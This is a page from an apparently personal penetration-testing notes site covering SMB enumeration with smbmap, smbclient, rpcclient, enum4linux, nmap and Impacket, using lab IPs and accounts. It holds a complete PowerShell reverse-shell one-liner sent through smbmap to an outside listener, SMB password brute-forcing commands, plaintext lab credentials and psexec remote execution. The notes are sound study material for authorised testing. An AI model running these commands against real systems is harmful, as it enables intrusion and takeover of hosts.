Hacknetics
  • Hacknetics
  • Active Directory Management
    • How to Join a Windows 11 PC to a Domain
    • Allow RDP in the domain
  • Active Directory AD Attacks
    • Bloodhound
      • Bloodhound Cypher Queries
    • Impacket-install
    • Kerberos cheatsheet
    • Domain Controllers
    • Overpass The Hash/Pass The Key (PTK)
    • Bloodhound Python
    • Rubeus to Ccache
    • Silver Ticket
    • Golden Ticket
    • Abusing GPO Permissions
    • AppLocker Bypasses
    • SharpView Enumeration
    • DonPapi
    • AD Overview
    • Enumerating Forests
    • NOPAC Priv esc
  • buffer-overflows
    • Buffer Overflows
  • c2-frameworks
    • Sliver
    • Powershell Empire
      • IronPython Empire
    • Metasploit
      • Metasploit Basics
      • Custom MSF Resource Scripts
      • Meterpreter Device Survey
      • Paranoid Mode
    • Pwncat-cs
    • Cobalt Strike
    • Dcrat
      • Modules
      • Builder
      • Dcrat AV Evasion
      • C2 Comms
    • FFM Documentation
  • covering-tracks
    • Evading Logging and Monitoring
    • Linux Logging
    • Tor
    • Windows Log Clearing
    • Ghost Writing Binaries
    • Backdoor Linux Commands
  • Data Exfiltration
  • Exploit Development
    • ROP Finding the vulnerable function
    • Useful Tools for Exploit Dev
    • ropeme
    • Obtaining MSFT Patches for Analysis
    • Mutiny Fuzzer
    • GDB
  • file-transfers
    • Transfering Files
  • lateral-movement
    • Pivoting Enumeration
      • Proxychains and FoxyProxy
      • SSH Tunneling and Port Forwarding
      • Plink.exe
      • socat
      • Chisel
      • SShuttle
  • lin-priv-esc
    • Linux Privilege Escalation
    • Bash Jails
    • ssh agent
  • Things I have Pwn'd before
    • Tomcat
    • Jenkins
  • persistence
    • Linux Persistence
    • Windows Persistence
      • Assign Group Memberships
      • Guest Windows Account Persistence
      • WMI Persist With Event Filters
      • SAM SYSTEM Exfil / Pass The Hash
      • Backdoor Executable
      • Special Privileges and Security Descriptors
      • RID Hijacking
      • Task Scheduler
      • Hijacking File Associations
      • Abusing Services
      • Logon Triggered Persistence
      • MSSQL Enabling xp cmdshell
      • Sticky Keys
      • Using Web Shells
  • recon-enumeration
    • Exploit Research
    • Pentesting DNS
    • Pentesting Kerberos
    • Pentesting FTP
    • Pentesting Email
    • Pentesting SMB
    • Pentesting Redis
    • Banner Grabbing
    • Pentesting Rsync
    • Pentesting MsSql
    • Scanning
    • Pentesting SNMP
    • Pentesting NFS
    • Pentesting LDAP
    • Pentesting Finger
    • User Recon
  • resources
    • resources
    • Youtube / Book List
    • CS/Software Engineer Resources
  • shells
    • Shells
    • web-shells
      • PHP Reverse Shell
      • wwwolf's PHP web shell
  • tool-guides
    • Asymmetric File Encrypt and Decrypt
    • Aws Buckets
    • cewl-crunch
    • Creating a Custom Wordlist
    • evil-winrm
    • Git
    • gobuster
    • Hashcat
    • Hydra User Guide
    • John
    • Linux Basics
    • Mimikatz
    • netcat
    • Nmap
    • nuclei
    • PowerView
    • r2
    • Resources
    • tcpdump
    • T-Shark User Guide
    • tmux
    • ssh
    • Vim
    • Wireshark
    • kwp
    • LAPS
    • KeePass KeeThief
    • FileCryptography.psm1
    • Impacket Pastable Commands
    • crackmapexec Pastable Commands
    • feroxbuster
    • NetExec
    • Ligolo-ng
    • gs-netcat
    • Scarecrow
  • Web Path
    • Testing for LFI
    • Testing for RFI
    • Testing for SQL
    • Testing for XSS
    • Authentication Bypass
    • Cmd Injection
    • Javascript Vulnerabilities
    • SSTI
    • Web Servers
    • JWT Tokens
    • Adobe Coldfusion
    • NoSQL Injection
    • vhost Enumeration
  • Wifi/Bluetooth/ZigBee/SDR/SmartCards
    • Wifi Capture Filters
    • Bluetooth Basics
    • Wifi Overview
    • Bettercap Bluetooth / Wifi
    • Aircrack-ng
    • Airdecap-ng
    • Aireplay-ng
    • RTL-SDR Radio
    • Bluetooth Low Energy
    • Smart Cards
    • Airodump-ng Airgraph-ng
    • gqrx
  • Windows
    • powershell-cheatsheet
    • Windows Privlage Escalation
    • Anti-Virus Evasion
    • Windows Registry
    • exploits
      • printspoofer
    • Windows Kernel Vulnerabilities
    • Windows Defender
    • AMSI Bypasses
    • pktmon Packet Capture Windows
    • Powershell Constrained Language Mode
    • Windows Survey
    • Windows Persistence
    • Windows World Writeable Dirs
  • firewalls
    • iptables
    • ufw
    • netsh advfirewall
  • Malware Analysis
    • Malware Analysis Fundamentals
    • Packer Identification by File section names
    • Analyzing Malicious Documents
    • In Depth Malware Analysis
    • Reversing Malicious Code
  • Infrastructure Development
    • SSL Cert Generation
    • Pfsense
      • OpenVPN Server on Pfsense
    • Proxmox OVA Import
  • Python3 Reference
    • Python3 Cheatsheet
    • Regex Python3
  • EDR
    • Velociraptor EDR
  • Host Forensics
    • Windows Host Forensics
    • Windows NT Versions
    • Windows Logs
  • Cloud
    • AWS
  • OSINT
    • Spiderfoot
    • Shodan Dorks
  • Phishing
  • Random
  • Linux
    • awk
    • cut
    • grep
    • sort
    • Cups CVE2024
  • Windows Malware Development
    • Win32 API
    • Processes Threads Handles
      • Message Box Example (Basic)
      • CreateProcess Example (Basic)
  • Golang
  • Mikrotik
    • Implementing a Password Reset Function for Persistent Access in MikroTik RouterOS
    • Cleaner Wrasse
  • Firmware Reversing
Powered by GitBook
On this page
  • SMB Enumeration
  • SMB Checklist
  • smbmap
  • smbclient
  • rpcclient
  • lookupsid.py Username Enumeration
  • Enum4linux
  • Nmap SMB scripts
  • Finding the Password Policy
  • Impacket psexec command execution

Was this helpful?

Edit on GitHub
  1. recon-enumeration

Pentesting SMB

SMB Enumeration

  • The SMB is a network file sharing protocol that provides access to shared files and printers on a local network.

  • When clients and servers use different operating systems and SMB versions, the highest supported version will be used for communication.

  • SMB uses the following TCP and UDP ports:

Netbios-ns 137/tcp #NETBIOS Name Service
Netbios-ns 137/udp
netbios-dgm 138/tcp #NETBIOS Datagram Service
Netbios-dgm 138/udp
Netbios-ssn 139/tcp #NETBIOS session service
Netbios-ssn 139/udp
Microsoft-ds 445/tcp #if you are using active directory

SMB Checklist

  • Basic Commands

  • From SMB command line

  • View/Get Files

get services.txt
more services.txt

  • Enumerate Hostname

nmblookup -A $ip

  • List Shares

smbmap -H $ip
smbclient -L 10.129.101.197 -U Administrator
nmap --script smb-enum-shares -p 139,445 $ip

  • Connect to a listed share

smbclient \\\\10.129.101.197\\C$ -U Administrator
smbclient \\\\$ip\\[share name]

  • Check Null Sessions

smbmap -u anonymous -H 10.10.115.116
smbmap -H $ip
rpcclient -U "" -N $ip

  • With authentication

smbmap -u svc-admin -p management2005 -H 10.10.248.93

  • Check for Vulnerabilities

nmap --script smb-vuln* -p 139,445 $ip

  • Overall Scan

enum4linux -a $ip

  • Get a shell with smbmap (windows)

smbmap -u jsmith -p 'R33nisP!nckle' -d ABC -h 192.168.2.50 -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""192.168.0.153""""; $port=""""4445"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize  ;$p=New-Object System.Diagnostics.Process  ;$p.StartInfo.FileName=""""cmd.exe""""  ;$p.StartInfo.RedirectStandardInput=1  ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0  ;$p.Start()  ;$is=$p.StandardInput  ;$os=$p.StandardOutput  ;Start-Sleep 1  ;$e=new-object System.Text.AsciiEncoding  ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length)  ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}}  if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else {  $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}}  $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"'

  • Brute Force SMB

medusa -h $ip -u userhere -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbnt
nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt $ip  -vvvv

smbmap

  • smbmap is one of the best ways to enumerate samba. smbmap allows pen-testers to run commands(given proper permissions), download and upload files, and overall is just incredibly useful for smb enumeration.

smbmap -u "admin" -p "password" -H 10.10.10.10 -x "ipconfig"

  • -s -> specify the share to enumerate

  • -d -> specify the domain to enumerate

  • --download -> downloads a file

  • --upload -> uploads a file

smbclient

  • List shares

smbclient -L 10.10.115.116

  • smbclient allows you to do most of the things you can do with smbmap, and it also offers you and interactive prompt.

  • -w -> specify the domain(workgroup) to use when connecting to the host

  • -I -> specify the ip address of the host

  • -c "ipconfig" -> would run the ipconfig command on the host

  • -U -> specify the username to authenticate with

  • -P -> specifies the password to authenticate with

  • -N -> tells smbclient to not use a password

  • get test -> would download the file named test

  • put /etc/hosts -> would put your /etc/hosts file on the target

  • Syntax:

  • To see which shares are available on a given host, run:

 /usr/bin/smbclient -L 10.10.10.10

  • For example, if you are trying to reach a directory that has been shared as 'public' on a machine called 10.10.10.10, the service would be called \10.10.10.10\public. -

  • However, due to shell restrictions, you will need to escape the backslashes, so you end up with something like this:

/usr/bin/smbclient \\\\10.10.10.10\\public mypasswd

  • To authenticate with a null sessions

smbmap -u 'root' -p '' -H 10.10.232.5 -x 'ip addr'

  • smbclient with domain credentials 

smbclient -U 'RLAB\ngodfrey' -p 445 -L 127.0.0.1

rpcclient

  • A tool used for executing client-side MS-RPC functions. A null session in a connection with a samba or SMB server that does not require authentication with a password.

rpcclient -U "" [target ip address]

  • The -U option defines a null username, you will be asked for a password but leave it blank (hit enter!!!!)

  • The command line will change to the rpcclient context

rpcclient $>

  • To retrieve some general information about the server like the domain and number of users:

querydominfo

  • This command returns the domain, server, total users on the system and some other useful information.

  • Also shows the total number of user accounts and groups available on the target system.

  • To retrieve a list of users present on the system

enumdomusers

  • The result is a list of user accounts available on the system with the RID in hex. We can now use rpcclient to query the user info for more information:

lookupsids #convert SIDs to names
lookupsids S-1-5-21-3981879597-1135670737-2718083060-1002
lookupnames #convert names to SIDs
lookupnames Bill
queryuser 0x47f #get the user rid form enomdomusers command
queryusergroups 0x47b #use the rid for the username to see their group membership
querygroup 0x47c #when you get the group membership back use those rids for this query
enumprivs
found 35 privileges
SeCreateTokenPrivilege          0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege           0:3 (0x0:0x3)
SeLockMemoryPrivilege           0:4 (0x0:0x4)
SeIncreaseQuotaPrivilege                0:5 (0x0:0x5)
SeMachineAccountPrivilege               0:6 (0x0:0x6)
SeTcbPrivilege          0:7 (0x0:0x7)
SeSecurityPrivilege             0:8 (0x0:0x8)
SeTakeOwnershipPrivilege                0:9 (0x0:0x9)
SeLoadDriverPrivilege           0:10 (0x0:0xa)
SeSystemProfilePrivilege                0:11 (0x0:0xb)
SeSystemtimePrivilege           0:12 (0x0:0xc)
SeProfileSingleProcessPrivilege                 0:13 (0x0:0xd)
SeIncreaseBasePriorityPrivilege                 0:14 (0x0:0xe)
SeCreatePagefilePrivilege               0:15 (0x0:0xf)
SeCreatePermanentPrivilege              0:16 (0x0:0x10)
SeBackupPrivilege               0:17 (0x0:0x11)
SeRestorePrivilege              0:18 (0x0:0x12)
SeShutdownPrivilege             0:19 (0x0:0x13)
SeDebugPrivilege                0:20 (0x0:0x14)
SeAuditPrivilege                0:21 (0x0:0x15)
SeSystemEnvironmentPrivilege            0:22 (0x0:0x16)
SeChangeNotifyPrivilege                 0:23 (0x0:0x17)
SeRemoteShutdownPrivilege               0:24 (0x0:0x18)
SeUndockPrivilege               0:25 (0x0:0x19)
SeSyncAgentPrivilege            0:26 (0x0:0x1a)
SeEnableDelegationPrivilege             0:27 (0x0:0x1b)
SeManageVolumePrivilege                 0:28 (0x0:0x1c)
SeImpersonatePrivilege          0:29 (0x0:0x1d)
SeCreateGlobalPrivilege                 0:30 (0x0:0x1e)
SeTrustedCredManAccessPrivilege                 0:31 (0x0:0x1f)
SeRelabelPrivilege              0:32 (0x0:0x20)
SeIncreaseWorkingSetPrivilege           0:33 (0x0:0x21)
SeTimeZonePrivilege             0:34 (0x0:0x22)
SeCreateSymbolicLinkPrivilege           0:35 (0x0:0x23)
SeDelegateSessionUserImpersonatePrivilege               0:36 (0x0:0x24)

  • Enumerate Privleges on the target box

getusername
Account Name: Guest, Authority Name: RELEVANT

  • Get username you are running as

queryuser [username]
username=pbx
queryuser pbx, queryuser 1000, queryuser 0x3e8

-This command will return information about the profile path on the server, the home drive, password related settings and a lot more.

  • To see an overview of all enumeration objects just type enum+tabx2.

  • If you get an error that says:

Cannot connect to server.  Error was NT_STATUS_CONNECTION_DISCONNECTED

  • Occurs because the minimum protocol version for smbclient has been set to SMB2_02

  • Fix with:

sudo vim /etc/samba/smb.conf

  • Add the following line to the config under the [global] section

client min protocol = CORE

  • Alternative method to enumdomusers is through RID cycling.

  • To determine the full SID we can run the: ‘lookupnames’ command and search for the domain with the following command:

lookupnames pbx

  • There are two sets of RIDS 500-1000 for system and 1000-10000 for Domain created users and groups.

  • If we append -500 to the SID and look it up using the lookupsids command we get the following output with the username:

rpcclient $> lookupsids S-1-5-21-532510730-1394270290-3802288464-500
S-1-5-21-532510730-1394270290-3802288464-500 *unknown*\*unknown* (8)

  • Shows SID is unknown, increase by one

rpcclient $> lookupsids S-1-5-21-532510730-1394270290-3802288464-501
S-1-5-21-532510730-1394270290-3802288464-501 PBX\nobody (1)

  • Find a valid user, increase the RID to 1000.

rpcclient $> lookupsids S-1-5-21-532510730-1394270290-3802288464-1000
S-1-5-21-532510730-1394270290-3802288464-1000 PBX\pbx (1)

  • Have the full SID now

lookupsid.py Username Enumeration

  • Impacket’s lookupsid.py performs bruteforcing of Windows SID’s to identify users/groups on the remote target.

  • You need to be able to connect to IPC$ without authentication or with a known password and username 

python3 lookupsid.py anonymous@10.10.11.35 | tee users.txt
Password:
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Brute forcing SIDs at 10.10.11.35
[*] StringBinding ncacn_np:10.10.11.35[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-917908876-1423158569-3159038727
498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: CICADA\Administrator (SidTypeUser)
501: CICADA\Guest (SidTypeUser)
502: CICADA\krbtgt (SidTypeUser)
512: CICADA\Domain Admins (SidTypeGroup)
513: CICADA\Domain Users (SidTypeGroup)
514: CICADA\Domain Guests (SidTypeGroup)
515: CICADA\Domain Computers (SidTypeGroup)
516: CICADA\Domain Controllers (SidTypeGroup)
517: CICADA\Cert Publishers (SidTypeAlias)
518: CICADA\Schema Admins (SidTypeGroup)
519: CICADA\Enterprise Admins (SidTypeGroup)
520: CICADA\Group Policy Creator Owners (SidTypeGroup)
521: CICADA\Read-only Domain Controllers (SidTypeGroup)
522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
525: CICADA\Protected Users (SidTypeGroup)
526: CICADA\Key Admins (SidTypeGroup)
527: CICADA\Enterprise Key Admins (SidTypeGroup)
553: CICADA\RAS and IAS Servers (SidTypeAlias)
571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
1000: CICADA\CICADA-DC$ (SidTypeUser)
1101: CICADA\DnsAdmins (SidTypeAlias)
1102: CICADA\DnsUpdateProxy (SidTypeGroup)
1103: CICADA\Groups (SidTypeGroup)
1104: CICADA\john.smoulder (SidTypeUser)
1105: CICADA\sarah.dantelia (SidTypeUser)
1106: CICADA\michael.wrightson (SidTypeUser)
1108: CICADA\david.orelious (SidTypeUser)
1109: CICADA\Dev Support (SidTypeGroup)
1601: CICADA\emily.oscars (SidTypeUser)

Enum4linux

  • Enum4linux is a linux alternative to enum.exe and it is used to enumerate data from windows or samba hosts.

enum4linux [target ip]

-Will auto RID cycle

  • Part of autorecon!

  • Recommend to > output to a text file for reference (its alot)

Nmap SMB scripts

ls -l /usr/share/nmap/scripts/smb*
nmap --script=[scriptname] [target ip]

  • For smb-os-discovery:

nmap -p 139,445 --script=smb-os-discovery [target ip]

  • First scans the target for all known SMB vulnerabilities

  • Second to see if target is vulnerable to EternalBlue

nmap -p 139,445 --script=smb-vuln* [target ip]
nmap -p 445 [target] --script=smb-vuln-ms17-010

Finding the Password Policy

  • Various ways to find a box's password policy 

crackmapexec smb 10.10.10.161 --pass-pol
crackmapexec smb 10.10.10.161 --pass-pol -u '' -p ''
enum4linux 10.10.10.161

  • The reason this will sometimes not work is because when you install a new domain now null sessions will be disabled

  • However when a domain was upgraded from Windows 2000/2003/2008 they kept this feature on in order to have backwards compatibility

Impacket psexec command execution 

psexec.py CICADA/emily.oscars:'Q!3@Lp#M6b*7t*Vt'@10.10.11.35 dir
PreviousPentesting EmailNextPentesting Redis

Last updated 6 months ago

Was this helpful?